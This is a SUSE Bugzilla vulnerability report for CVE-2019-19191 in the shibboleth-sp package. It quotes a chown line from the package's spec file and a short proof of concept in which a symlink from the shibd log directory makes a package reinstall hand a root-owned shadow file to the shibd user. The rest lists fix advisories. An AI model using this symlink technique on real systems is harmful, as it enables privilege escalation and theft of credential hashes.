Bugzilla – Bug 1157471
VUL-0: CVE-2019-19191: shibboleth-sp: Local privilege escalation from shibd to root in upstream spec file
Last modified: 2020-12-02 14:15:16 UTC
195 # Fix ownership of log files (even on new installs, if they're left from an older one). 196 chown %{runuser}:%{runuser} %{_localstatedir}/log/%{realname}/* 2>/dev/null || : this allows shibd to escalate to root. POC: sh-5.0$ id uid=157(shibd) gid=443(shibd) groups=443(shibd) sh-5.0$ pwd /var/log/shibboleth sh-5.0$ ls -lah /test total 12K drwxr-xr-x 2 root root 4.0K Nov 20 13:51 . drwxr-xr-x 23 root root 4.0K Oct 25 11:01 .. -rw-r----- 3 root root 1.2K Oct 25 13:20 shadow sh-5.0$ ln -s /test/shadow as root: zypper in -f shibboleth-sp sh-5.0$ ls -lah /test total 12K drwxr-xr-x 2 root root 4.0K Nov 20 13:51 . drwxr-xr-x 23 root root 4.0K Oct 25 11:01 .. -rw-r----- 3 shibd shibd 1.2K Oct 25 13:20 shadow As this is in the upstream spec file we'll not assign a CVE. I'll file a upstream report and ask MITRE for a CVE
Upstream issue: https://issues.shibboleth.net/jira/browse/SSPCPP-874
CVE-2019-19191 was assigned to this issue
SUSE-SU-2019:3386-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 1157471 CVE References: CVE-2019-19191 Sources used: SUSE Linux Enterprise Module for Server Applications 15-SP1 (src): shibboleth-sp-2.6.1-3.3.1 SUSE Linux Enterprise Module for Server Applications 15 (src): shibboleth-sp-2.6.1-3.3.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
openSUSE-SU-2020:0020-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 1157471 CVE References: CVE-2019-19191 Sources used: openSUSE Leap 15.1 (src): shibboleth-sp-2.6.1-lp151.3.3.1
SUSE-SU-2020:0115-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 1157471 CVE References: CVE-2019-19191 Sources used: SUSE OpenStack Cloud Crowbar 8 (src): shibboleth-sp-2.5.5-6.6.1 SUSE OpenStack Cloud 8 (src): shibboleth-sp-2.5.5-6.6.1 SUSE OpenStack Cloud 7 (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Software Development Kit 12-SP5 (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Software Development Kit 12-SP4 (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Server for SAP 12-SP3 (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Server for SAP 12-SP2 (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Server for SAP 12-SP1 (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Server 12-SP5 (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Server 12-SP4 (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Server 12-SP3-LTSS (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Server 12-SP3-BCL (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Server 12-SP2-LTSS (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Server 12-SP2-BCL (src): shibboleth-sp-2.5.5-6.6.1 SUSE Linux Enterprise Server 12-SP1-LTSS (src): shibboleth-sp-2.5.5-6.6.1 SUSE Enterprise Storage 5 (src): shibboleth-sp-2.5.5-6.6.1 HPE Helion Openstack 8 (src): shibboleth-sp-2.5.5-6.6.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Done